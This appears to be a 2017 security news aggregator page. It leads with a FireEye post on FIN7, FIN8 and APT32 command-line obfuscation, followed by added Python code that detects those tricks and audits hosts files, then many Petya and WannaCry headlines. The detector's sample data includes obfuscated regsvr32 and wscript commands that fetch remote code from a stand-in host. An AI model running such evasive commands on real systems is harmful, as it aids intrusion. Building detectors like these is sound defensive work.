Friday, June 30, 2017
Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques
Throughout 2017 we have observed a marked increase in the use of command line evasion and obfuscation by a range of targeted attackers. Cyber espionage groups and financial threat actors continue to adopt the latest cutting-edge application whitelisting bypass techniques and introduce innovative obfuscation into their phishing lures. These techniques often bypass static and dynamic analysis methods and highlight why signature-based detection alone will always be at least one step behind creative attackers.
In early 2017, FIN8 began using environment variables paired with PowerShell’s ability to receive commands via StdIn (standard input) to evade detection based on process command line arguments. In the February 2017 phishing document “COMPLAINT Homer Glynn.doc” (MD5: cc89ddac1afe69069eb18bac58c6a9e4), the file contains a macro that sets the PowerShell command in one environment variable (_MICROSOFT_UPDATE_CATALOG) and then the string “powershell -” in another environment variable (MICROSOFT_UPDATE_SERVICE). When the powershell.exe command line ends in a dash, PowerShell executes whatever it receives via StdIn, and only that dash appears in powershell.exe’s command line arguments. Figure 1 provides the commands that were extracted using Mandiant consultant Nick Carr’s FIN8 macro decoder.
Figure 1: FIN8 environment variable commands extracted from “COMPLAINT Homer Glynn.doc” macros
To evade many detections based on parent-child process relationships, FIN8 crafted this macro to use WMI to spawn the cmd.exe execution. WinWord.exe therefore never creates a child process; instead the process tree looks like wmiprvse.exe -> cmd.exe -> powershell.exe. FIN8 has regularly used obfuscation and WMI to remotely launch their PUNCHTRACK POS-scraping malware, and the 2017 activity is an implementation of these evasion techniques at an earlier stage of compromise.
As new application whitelisting bypass techniques have surfaced, targeted attackers have quickly adopted these into their campaigns with extra layers of obfuscation to stay ahead of many defenders. Many groups leverage the regsvr32.exe application whitelisting bypass, including APT19 in their 2017 campaign against law firms. The cyber espionage group APT32 heavily obfuscates their backdoors and scripts, and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017. Instead of using the argument /i:http for the regsvr32.exe bypass, APT32 used cmd.exe obfuscation techniques to attempt to break signature-based detection of this argument in April 2017. At FireEye we have seen them include both /i:^h^t^t^p and /i:h”t”t”p in their lures. Figure 2 shows a redacted screenshot of our Host Investigative Platform (HIP) capturing real-time attacker activity during one of our Mandiant incident response engagements for APT32 activity.
Figure 2: APT32 command obfuscation for regsvr32.exe application whitelisting bypass
Meanwhile, FIN7 has continued to wreak havoc on the restaurant, hospitality, and financial services sectors in 2017. To ensure their arsenal did not grow stale, in April 2017 FIN7 shifted to using wscript.exe to run JavaScript payloads that retrieve an additional payload hidden in the phishing document by use of the Word.Application COM object.
This week, FireEye identified FIN7 introducing additional obfuscation techniques at both the JavaScript and cmd.exe levels. These methods rely on FIN7’s preferred method of hiding shortcut files (LNK files) in their DOCX and RTF phishing documents to initiate the infection. At the time of writing, the files implementing this technique were detected by 0 antivirus engines. For JavaScript, instead of specifying “Word.Application” for the COM object instantiation, FIN7 began concatenating the string as “Wor”+”d.Application”. In addition, JavaScript’s suspicious “eval” string was transformed into “this[String.fromCharCode(101)+’va’+’l’]”. Finally, they used a little-known character replacement functionality supported by cmd.exe. The wscript.exe command is set in a process-level environment variable “x”, but is obfuscated with the “@” character. When the “x” variable is echoed at the end of the script, the “@” character is removed by the syntax “%x:@=%”. Figure 3 shows this command extracted from a LNK file embedded within a new FIN7 phishing document.
Figure 3: FIN7 command obfuscation from LNK file phishing document
In this example, FIN7 implements FIN8’s passing of commands via StdIn – this time passing it to cmd.exe instead of powershell.exe – but the evasion effect is the same. While this example will expose these arguments in the first cmd.exe’s command execution, if this environment variable were set within the LNK or a macro and pushed to cmd.exe via StdIn from VBA, then nothing would appear on the command line.
The FireEye iSIGHT Intelligence MySIGHT Portal contains detailed information on these attackers – and all financial and cyber espionage groups that we track – including analysis of their malware, tactics, and further intelligence attribution.
We fully expect targeted attackers to continue this pattern of adopting new bypass techniques and adding innovative obfuscation at both the macro and command line levels. As for what we might see next, we’d recommend reading up on DOS command line tricks so that monitoring your network isn’t the first time you see new attacker tricks. Network defenders must understand what obfuscation is possible, assess their endpoint and network visibility, and most importantly not rely on a single method to detect these attacks.
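The evasion patterns described above (the trailing dash on powershell.exe, the caret and quote insertion around /i:http, the %x:@=% substring substitution, and the wmiprvse.exe parent) can be caught by normalising the command line the way cmd.exe and the child's argument parser would before matching, while still keeping the raw command line for the obfuscation indicators themselves. The following Python is an added example written for this page, not FireEye's or Mandiant's code; the process-creation events and the placeholder.invalid host are constructed, and the rule names are my own.

```python
"""Normalise cmd.exe-level obfuscation and flag the evasion patterns the
post describes.  Added example: the events below are constructed, not real
telemetry, and placeholder.invalid is not an indicator."""
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed process-creation events: parent image, image, raw command line.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # cmd.exe spawned via WMI; command hidden in variable x, unmasked with %x:@=%
    {"parent": "wmiprvse.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "set x=@w@s@c@r@i@p@t@ //e:jscript payload.txt'
                '&& cmd /c echo %x:@=%"'},
    # powershell.exe told to read its script from StdIn: only "-" is visible
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell -"},
    # regsvr32 /i:http argument split with carets, then with inserted quotes
    {"parent": "winword.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /i:^h^t^t^p://placeholder.invalid/x"},
    {"parent": "winword.exe", "image": "regsvr32.exe",
     "cmdline": 'regsvr32.exe /s /i:h"t"t"p://placeholder.invalid/x'},
    # benign control that must not fire
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
]

ENV_REF = re.compile(r"%([A-Za-z_]\w*)(?::([^=%]+)=([^%]*))?%")   # %V% or %V:old=new%
SET_STMT = re.compile(r'\bset\s+([A-Za-z_]\w*)=([^&"]*)', re.I)    # set NAME=VALUE


def normalize_cmd(cmdline: str, env: Optional[Dict[str, str]] = None) -> str:
    """Return the command line as the launched program would see it.

    Over-normalises on purpose (a caret inside quotes is dropped too); for
    detection that can only add matches, never hide one.
    """
    variables = {k.upper(): v for k, v in (env or {}).items()}
    # cmd.exe escape character: the caret is removed and the next char kept.
    s = re.sub(r"\^(.)", r"\1", cmdline)
    # Quotes are stripped by the child's argument parsing, so h"t"t"p -> http.
    s = s.replace('"', "")
    # Pick up variables defined on the same line (set x=...) for later %x% refs.
    for name, value in SET_STMT.findall(s):
        variables[name.upper()] = value

    def expand(m):
        value = variables.get(m.group(1).upper())
        if value is None:
            return m.group(0)                      # unknown variable: keep as-is
        if m.group(2):                             # %VAR:old=new% substitution
            return value.replace(m.group(2), m.group(3) or "")
        return value

    return ENV_REF.sub(expand, s)


# Each rule sees the raw event and the normalised command line.
RULES: List[Tuple[str, Callable[[Dict[str, str], str], bool]]] = [
    # powershell.exe launched with a lone trailing "-": script arrives over StdIn
    ("powershell_stdin_dash",
     lambda ev, norm: ev["image"].lower() == "powershell.exe"
     and re.search(r"\s-$", ev["cmdline"].rstrip()) is not None),
    # regsvr32 pulling a remote scriptlet; visible only after normalisation
    ("regsvr32_http_bypass",
     lambda ev, norm: ev["image"].lower() == "regsvr32.exe"
     and re.search(r"/i:https?://", norm, re.I) is not None),
    # carets, or a quote inside a word, in the raw command line
    ("cmd_caret_or_quote_obfuscation",
     lambda ev, norm: "^" in ev["cmdline"]
     or re.search(r'\w"\w', ev["cmdline"]) is not None),
    # %VAR:old=new% substring substitution used to unmask a hidden command
    ("cmd_env_substring_substitution",
     lambda ev, norm: re.search(r"%\w+:[^=%]+=[^%]*%", ev["cmdline"]) is not None),
    # shell spawned by the WMI provider host instead of the Office parent
    ("wmi_spawned_shell",
     lambda ev, norm: ev["parent"].lower() == "wmiprvse.exe"
     and ev["image"].lower() in ("cmd.exe", "powershell.exe")),
]


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every rule over every event; return normalised line plus rule hits."""
    findings = []
    for ev in events:
        norm = normalize_cmd(ev["cmdline"])
        hits = [name for name, check in RULES if check(ev, norm)]
        findings.append({"image": ev["image"], "normalized": norm, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["image"], f["hits"], "|", f["normalized"])
```

Signatures written against the normalised string match both the plain and the obfuscated forms of an argument, and the raw command line still feeds the indicator rules, since the mere presence of carets or a %VAR:old=new% reference in a process command line is itself worth an alert. As the post notes, none of this helps when the command arrives over StdIn; that case needs the parent-process and script-block visibility the closing paragraph asks for.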
Cyber Security Roundup for June 2017
NEWS
- Petya / NotPetya / Petrwrap Ransomware Attack
- NSA & GCHQ link North Korea with the global WannaCry Ransomware Attack
- Parliament Cyber Attack 'hit up to 90 users'
- UK Government Digital Service Site User Data Breached
- Four Arrests in UK over Microsoft Technical Support Scam Phone Calls
- UK Online Fraud Overlooked by the Government, Police and Business
- Password Manager OneLogin hit by Data Breach
- Virgin Media tells 800,000 Users to Change Passwords over Router Hacking Risk
- ICO Fines Gloucester City Council £100k for not patching the Heartbleed Bug
- The US Health Insurer is to pay out over £90m after Hackers Stole Customer Records
- WannaCry Cyber Attack Halts Production at Honda
- Cyber Due-Diligence Now Forms an Essential part of M&A Planning
- UK Hacker exploits Clydesdale & Yorkshire Online Bank loophole to Steal £100,000
- Personal Details of nearly 200 Million US Citizens Exposed
- South Korean Hosting Firm Pays $1 Million Ransom
- Microsoft to Remove SMB1 protocol used by WannaCry & Petya from Windows 10
- Microsoft release Security Updates to fix 94 flaws, including on Windows XP & Windows 2003
- Adobe releases Critical Security Updates Flash Player and Shockwave Player
- Hidden Cobra: North Korea’s DDoS Botnet Infrastructure
- Hidden Cobra and DeltaCharlie: An Explainer
- Apple Mac computers targeted by Ransomware and Spyware
- Firewall Adware Epidemic Infects 9% of UK Networks
- 2017 Trustwave Global Security Report
- PwC 2016 Digital Annual Report: UK Councils unable to cope with Cyber Threats
- Druva Annual Ransomware Report: 2017 Survey
BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
SSD Advisory – Odoo CRM Code Execution
Food Supplier Passes Squid Off as Octopus
According to a lawsuit (main article behind paywall), "a Miami-based food vendor and its supplier have been misrepresenting their squid as octopus in an effort to boost profits."
Details from the 2017 Workshop on Economics and Information Security
The 16th Workshop on Economics and Information Security was this week. Ross Anderson liveblogged the talks.
Ben’s Book of the Month: Review of “Information Security Policies Made Easy”
Risk Containment Strategies to Avoid the Next Petya
UK government threatens to launch drone strikes against hackers
Coming Microsoft Reorg to Support Cloud-First Strategy: Report
Cyber News Rundown: Edition 6/30/17
The Cyber News Rundown brings you the latest happenings in cyber news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst, and a guy with a passion for all things...
The post Cyber News Rundown: Edition 6/30/17 appeared first on Webroot Threat Blog.
This company deliberately deleted its customer email mailing list. Maybe you should too
AnswerX – Akamai’s ‘Secret’ DNS Platform
Things we have learned about Petna, the Petya-based malware
Earlier this week, we saw another mass ransomware attack happen, less than two months after the WannaCry outbreak. In the hours and days after the attack, this strain was given many different names, including Petya, Petna, NotPetya, EternalPetya, Nyetya, and many more. We originally referred to it as Petya-based, but for simplicity, let’s call it Petna.
How to Create a Retention Policy and Apply it to User Mailboxes in Exchange Online
IT Pro Today PODCAST – Episode 3
Good Article About Google's Project Zero
Fortune magazine just published a good article about Google's Project Zero, which finds and publishes exploits in other companies' software products.
I have mixed feelings about it. The project does great work, and the Internet has benefited enormously from these efforts. But as long as it is embedded inside Google, it has to deal with accusations that it targets Google competitors.
The Women of Bletchley Park
Really good article about the women who worked at Bletchley Park during World War II, breaking German Enigma-encrypted messages.
Websites Grabbing User-Form Data Before It's Submitted
Websites are sending information prematurely:
...we discovered NaviStone's code on sites run by Acurian, Quicken Loans, a continuing education center, a clothing store for plus-sized women, and a host of other retailers. Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
This is important because it goes against what people expect:
In yesterday's report on Acurian Health, University of Washington law professor Ryan Calo told Gizmodo that giving users a "send" or "submit" button, but then sending the entered information regardless of whether the button is pressed or not, clearly violates a user's expectation of what will happen. Calo said it could violate a federal law against unfair and deceptive practices, as well as laws against deceptive trade practices in California and Massachusetts. A complaint on those grounds, Calo said, "would not be laughed out of court."
This kind of thing is going to happen more and more, in all sorts of areas of our lives. The Internet of Things is the Internet of sensors, and the Internet of surveillance. We've long passed the point where ordinary people have any technical understanding of the different ways networked computers violate their privacy. Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.
Thursday, June 29, 2017
How to Choose a WordPress Security Plugin that’s Right for You
There are currently 50,416 plugins available in the WordPress repository. Out of these, roughly seven percent are security-based plugins. At the same time, when you search Google for “WordPress security plugin,” 14,600,000 results come up. How can you choose a plugin from all these options? To answer that question, it’s important to understand what a […]
The post How to Choose a WordPress Security Plugin that’s Right for You appeared first on The State of Security.
NonPetya: no evidence it was a “smokescreen”
Certainly, things look suspicious. For one thing, it certainly targeted the Ukraine. For another thing, it made several mistakes that prevent them from ever decrypting drives. Their email account was shut down, and it corrupts the boot sector.
But these things aren't evidence, they are problems. They are things needing explanation, not things that support our preferred conspiracy theory.
The simplest, Occam's Razor explanation is that they were simple mistakes. Such mistakes are common among ransomware. We think of virus writers as professional software developers who thoroughly test their code. Decades of evidence show the opposite, that such software is of poor quality with shockingly bad bugs.
It's true that effectively, nPetya is a wiper. Matthieu Suiche does a great job describing one flaw that prevents it working. @hasherezade does a great job explaining another flaw. But the best explanation isn't that this is intentional. Even if these bugs didn't exist, it'd still be a wiper if the perpetrators simply ignored the decryption requests. They need not intentionally make the decryption fail.
Thus, the simpler explanation is that it's simply a bug. Ransomware authors test the bits they care about, and test less well the bits they don't. It's quite plausible to believe that just before shipping the code, they'd add a few extra features, and forget to regression test the entire suite. I mean, I do that all the time with my code.
Some have pointed to the sophistication of the code as proof that such simple errors are unlikely. This isn't true. While it's more sophisticated than WannaCry, it's about average for the current state-of-the-art for ransomware in general. What people think of, such as the Petya base, or using PsExec to spread throughout a Windows domain, is already at least a year old.
Indeed, the use of PsExec itself is a bit clumsy, when the code for doing the same thing is already public. It's just a few calls to basic Windows networking APIs. A sophisticated virus would do this itself, rather than clumsily use PsExec.
Infamy doesn't mean skill. People keep making the mistake that the more widespread something is in the news, the more skill, the more of a "conspiracy" there must be behind it. This is not true. Virus/worm writers often do newsworthy things by accident. Indeed, the history of worms, starting with the Morris Worm, has been things running out of control more than the author's expectations.
What makes nPetya newsworthy isn't the EternalBlue exploit or the wiper feature. Instead, the creators got lucky with MeDoc. The software is used by every major organization in the Ukraine, and at the same time, their website was horribly insecure -- laughably insecure. Furthermore, its autoupdate feature didn't check cryptographic signatures. No hacker can plan for this level of widespread incompetence -- it's just extreme luck.
Thus, the effect of bumbling around is something that hit the Ukraine pretty hard, but it's not necessarily the intent of the creators. It's like how the Slammer worm hit South Korea pretty hard, or how the Witty worm hit the DoD pretty hard. These things look "targeted", especially to the victims, but it was by pure chance (provably so, in the case of Witty).
Certainly, MeDoc was targeted. But then, targeting a single organization is the norm for ransomware. They have to do it that way, giving each target a different Bitcoin address for payment. That it then spread to the entire Ukraine, and further, is the sort of thing that typically surprises worm writers.
Finally, there's little reason to believe that there needs to be a "smokescreen". Russian hackers are targeting the Ukraine all the time. Whether Russian hackers are to blame for "ransomware" vs. "wiper" makes little difference.
Conclusion
We know that Russian hackers are constantly targeting the Ukraine. Therefore, the theory that this was nPetya's goal all along, to destroy Ukraine's computers, is a good one.
Yet, there's no actual "evidence" of this. nPetya's issues are just as easily explained by normal software bugs. The smokescreen isn't needed. The boot record bug isn't needed. The single email address that was shut down isn't significant, since half of all ransomware uses the same technique.
The experts who disagree with me are really smart/experienced people who you should generally trust. It's just that I can't see their evidence.
Update: a comment asks "why is there no Internet spreading code?". The answer is "I don't know", but unanswerable questions aren't evidence of a conspiracy. "Why aren't there any stars in the background?" isn't proof the moon landings are fake just because you can't answer the question. One guess is that you never want ransomware to spread that far until you've figured out how to get payment from so many people.
Happy Agents = Satisfied Customers: How to Improve Your Call Centre Turnover
By Caroline Thomson, HR Director Life as a call centre agent tends to come with an infamous reputation. Typically high-stress, low-paying and repetitive, this kind of customer experience work means it can be difficult for call centres to retain their staff. With attrition rates of up to 50 per cent – a higher turnover rate […]
The post Happy Agents = Satisfied Customers: How to Improve Your Call Centre Turnover appeared first on Semafone.
Making “Connections” at the Industrial IoT University
Embedded Computing Design’s second Industrial IoT University conference occurred this week, with industry experts from Cisco, zigbee alliance, Digi International, LoRa Alliance, Trusted Computing Group, Renesas, Mentor Graphics, Wind River, Software Design Solutions, and Blue Ridge Advanced Design and Automation addressing networking and security challenges for an audience of more than 100 IoT engineers.
The post Making “Connections” at the Industrial IoT University appeared first on Trusted Computing Group.
Protecting Oracle E-Business Suite: Password Policy
For a third week in a row, we’re providing you with best practices for securing your Oracle E-Business Suite implementation. Today, we are going to talk about a common topic: password security. When it comes to password policy, the first thing that probably comes to mind is having a secure password. That is why, in addition to all network security layers, it is very important to have a proper password policy, along with user lists and groups, so as to follow a guideline for how passwords are formed.
BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
Facebook gives moderators “full access” to user accounts suspected of terror links
Does Going Serverless Save You Money?
Code Failure, Again
Hacking nuclear submarines – how likely is the nightmare scenario?
Untangle Named to Gartner’s 2017 Magic Quadrant for Unified Threat Management (SMB Multifunction Firewalls)
Webinar: Stomp Out Malware from Encrypted Traffic with Cisco Stealthwatch and Cognitive Analytics
Microsoft Adds Cloudyn to their Portfolio for Cloud Analytics and Usage Optimization on Azure
Facial recognition: it’s much more widespread than you might think
The Advantage of Heuristic Over Signature Based Web Vulnerability Scanners
Future-proof your Cisco ACE refresh
It has been a while since Cisco announced end-of-life for its Application Control Engine (ACE) products. The last date of support, January 31, 2019, is fast approaching. If you rely on ACE for load balancing in your environment, it is time to migrate and look to the future. Key considerations for migrating from Cisco ACE: […]
The post Future-proof your Cisco ACE refresh appeared first on Radware Blog.
WannaCry Delivers a Wake-up Call for Protecting Industrial Control Systems: (Part 1)
The recent ransomware worm in the WannaCrypt or WannaCry (Wcry) malware infected more than 200,000 systems across 150 countries. The virus targeted out of date computing systems not unlike those that can be found in an industrial control system (ICS). While WannaCry impacted banks, healthcare providers and other non-industrial entities this time, next time the …
The post WannaCry Delivers a Wake-up Call for Protecting Industrial Control Systems: (Part 1) appeared first on Trusted Computing Group.
How to Create a Public Folder in Office 365 Exchange Online
Wednesday, June 28, 2017
What’s All This NIST Security Noise About?
There is quite a bit of NIST security noise that should not be dismissed. Whether you are a federal agency or not, NIST has significant meaning for you. The National Institute of Standards Technology (NIST) is a lab and federal non-regulated agency organization that offers guidance to promote innovation and industrial competitiveness. When it comes […]
The post What’s All This NIST Security Noise About? appeared first on The State of Security.
Groundhog Day 2017 – or Any Other Day
Another not cloudy but brilliant morning to wake up to. It might be summer somewhere. But I don’t need a clock radio. Instead, I consume news from around the world at breakfast or on the way to some office. But “I Got You Babe” seems to be playing everywhere. Clearly, I am not actually in […]
The post Groundhog Day 2017 – or Any Other Day appeared first on The State of Security.
Not NotPetya (An analysis of Karo Ransomware)
While there was a lively running debate over whether it was Petya or NotPetya yesterday, we can all agree that what locked up some of the world’s largest shipping companies, spread through the infamous SMB exploit, and may have been delivered as an infected update, was not Karo. However, this obscure ransomware family was launched into the spotlight due to early confusion over Petya's initial infection vector.
Petya May Not be the Ransomware Everyone Thought it Was
BSides Cleveland 2017, Arianna Willett’s ‘Quantifying Security’s Value – It Can Be Done’
NotPetya: Timeline of a Ransomworm
On June 27, 2017, a digital attack campaign struck banks, airports and power companies in Ukraine, Russia and parts of Europe. Security experts who analyzed the attack determined its behavior was consistent with a form of ransomware called Petya. They also observed the campaign was using a familiar exploit to spread to vulnerable machines. Let’s […]
The post NotPetya: Timeline of a Ransomworm appeared first on The State of Security.
New Tech Support Scam Strikes Amazon, eBay, and Alibaba Customers
In a world where new cyber threats seem to develop almost daily, it’s easy to forget that some tactics have stood the test of time.
Since mid-May, PhishLabs has been tracking an ongoing consumer-focused email phishing campaign.
And what tactic have they been using? The dreaded tech support scam.
No matter how much technology develops, threat actors will nearly always default to the simplest tactic that still works. And when it comes to consumer-focused phishing, there’s nothing simpler (and more effective) than a well constructed tech support scam.
New Petya ransomware: everything you wanted to know (but were afraid to ask)
Girl Scouts to Offer Merit Badges in Cybersecurity
The Girl Scouts are going to be offering 18 merit badges in cybersecurity, to scouts as young as five years old.
Physical Security Assessment: Traditional and Nontraditional Tools and Techniques
Petya: The poison behind the latest ransomware attack
SCADA: Changing the Dynamic
How do we build a truly resilient security framework directly incorporating micro segmentation into the SCADA systems and our network in order to protect it, when we can’t add security controls for fear of the business consequences? I think the solution is quite obvious on the surface: change the dynamic that has existed within our […]
The post SCADA: Changing the Dynamic appeared first on Radware Blog.
Deconstructing Petya: how it spreads and how to fight back
Four arrested as Microsoft and UK police team up to crack down on technical support scammers
The Mechanisms of Support Scamming
Staying Ahead of the Curve
As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.
Use Tenable.io to quickly address systems that are at risk
Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.
Malware scanning
Tenable.io includes a customizable malware scan template where you can incorporate both known-good and known-bad MD5 hashes, along with a hosts file whitelist. On a default Windows system the hosts file contains only comment lines, including two commented-out localhost entries. Most systems query DNS servers to resolve domain names to IP addresses, but some organizations add hosts file entries for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system uses the entries within the hosts file first and bypasses the records on your DNS server.
Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.
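An audit of the hosts file along the lines the two paragraphs above describe: parse the live entries, skip the organisation's approved entries, and flag names that have been sinkholed to a loopback or null address or pointed somewhere unexpected, with extra weight when the name belongs to a domain you rely on staying reachable (a security vendor's update hosts, for instance). This is an added example, not Tenable's scan logic; the hosts file content, the whitelist and the example domains are constructed.

```python
"""Audit a Windows hosts file against an approved whitelist.
Added example for this page, not Tenable's scan logic; all data is constructed."""
import ipaddress
from typing import Dict, Iterable, List, Set, Tuple

# Constructed hosts file from a hypothetical tampered workstation.
SAMPLE_HOSTS = """\
# Sample hosts file (constructed for this example)
# 127.0.0.1       localhost
# ::1             localhost
10.0.5.20     build.corp.example            # approved internal mapping
127.0.0.1     update.av-vendor.example      # sinkholes an update server
0.0.0.0       telemetry.av-vendor.example   # null-routes a second one
192.0.2.7     login.bank.example            # redirect to a constructed address
"""

# Entries the organisation has approved (constructed).
WHITELIST: Set[Tuple[str, str]] = {("10.0.5.20", "build.corp.example")}

# Entries that are harmless on any system and are never reported.
ALWAYS_OK = {("127.0.0.1", "localhost"), ("::1", "localhost")}
# Addresses that make a name unreachable rather than redirecting it.
SINKHOLE_ADDRESSES = {"127.0.0.1", "0.0.0.0", "::1", "::"}


def parse_hosts(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, ip, hostname) for each live, well-formed entry.
    Text after '#' is dropped, so commented-out lines yield nothing."""
    entries = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: malformed line, skip it
        for hostname in fields[1:]:
            entries.append((number, fields[0], hostname.lower()))
    return entries


def audit_hosts(text: str, whitelist: Set[Tuple[str, str]],
                protected_suffixes: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Report every live entry that is not approved.

    'sinkholed'  : name points at a loopback/null address (service blocked)
    'unexpected' : name points somewhere else (possible redirect)
    '_protected' : appended when the name falls under a suffix you expect to
                   stay reachable, e.g. a security vendor's update domain
    """
    approved = set(whitelist) | ALWAYS_OK
    suffixes = tuple(s.lower() for s in protected_suffixes)
    findings = []
    for number, ip, hostname in parse_hosts(text):
        if (ip, hostname) in approved:
            continue
        kind = "sinkholed" if ip in SINKHOLE_ADDRESSES else "unexpected"
        if suffixes and hostname.endswith(suffixes):
            kind += "_protected"
        findings.append({"line": number, "ip": ip, "host": hostname, "kind": kind})
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS, WHITELIST, ("av-vendor.example",)):
        print(finding)
```

The whitelist is keyed on the (address, name) pair rather than the name alone, so an approved name repointed at a different address is still reported; the comment-stripping step is what keeps the two default commented-out localhost lines from ever showing up as findings.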
Enabling the File System Scanning option lets you scan specific directories within your Windows environment, such as C:\Windows, C:\Program Files, and the User Profile directories, that are frequently used to install malware. You can also scan for malware within directories such as C:\ProgramData that are hidden by default on Windows systems.
Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.
The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.
Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.
Vulnerabilities
The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware, among other findings.
Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.
Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, MD5 hash matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into a website through a cross-site scripting (XSS) or SQL injection vulnerability.
Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.
Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.
Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.
Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.
No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.
Start with Tenable.io
To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.
from Staying Ahead of the Curve
Office 365 Customers Can Now Begin Using SharePoint Communication Sites
from Office 365 Customers Can Now Begin Using SharePoint Communication Sites
Ready, Set, Authenticate: Why You Need RSA SecurID® Access to Win the Race
There are times when trying to put together an effective authentication strategy feels like competing in track-and-field events. Business and IT are supposed to be on the same team, but far too often seem to be racing toward completely different goals. Sure, it’s important to get to the finish line fast, but not at the…
The post Ready, Set, Authenticate: Why You Need RSA SecurID® Access to Win the Race appeared first on Speaking of Security - The RSA Blog.
from Ready, Set, Authenticate: Why You Need RSA SecurID® Access to Win the Race
Anthem to pay record $115m to settle lawsuits over massive breach
from Anthem to pay record $115m to settle lawsuits over massive breach
Tuesday, June 27, 2017
To #Petya or #NotPetya – It’s an Important Question
I’ve been blogging on WannaCry recently, my last post was all about the question, “Why was this allowed to happen?” As I stated then, Microsoft did indeed release a Bulletin MS17-010 and patch for the SMBv1 vulnerability that ultimately was exploited by the WannaCry attack in March. Presumably, every concerned system administrator patched […]
The post To #Petya or #NotPetya – It’s an Important Question appeared first on WhiteHat Security.
from To #Petya or #NotPetya – It’s an Important Question
Petya-based Ransomware Assaults Global Networks
A host of companies across industries have confirmed attacks today by a brutal wave of ransomware, including global law firm DLA Piper, U.S. pharmaceutical giant Merck, and the Danish shipping company Maersk. Although…
The post Petya-based Ransomware Assaults Global Networks appeared first on Webroot Threat Blog.
from Petya-based Ransomware Assaults Global Networks
Petya Ransomware Spreading Via EternalBlue Exploit
On June 27, 2017, multiple organizations – many in Europe – reported significant disruptions they are attributing to Petya ransomware. Based on initial information, this variant of the Petya ransomware may be spreading via the EternalBlue exploit used in the WannaCry attack from last month.
Trusted sources and open-source reporting have suggested that the initial infection vector for this campaign was a poisoned update for the MeDoc software suite, a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website currently displays a warning message in Russian stating: "On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!"
Our initial analysis of the artifacts and network traffic at victim networks indicates that a modified version of the EternalBlue SMB exploit was used, at least in part, to spread laterally, along with WMI commands, MimiKatz, and PSExec to propagate to other systems. Analysis of the artifacts associated with this campaign is still ongoing, and we will update this blog as new information becomes available.
FireEye has confirmed the following two samples related to this attack:
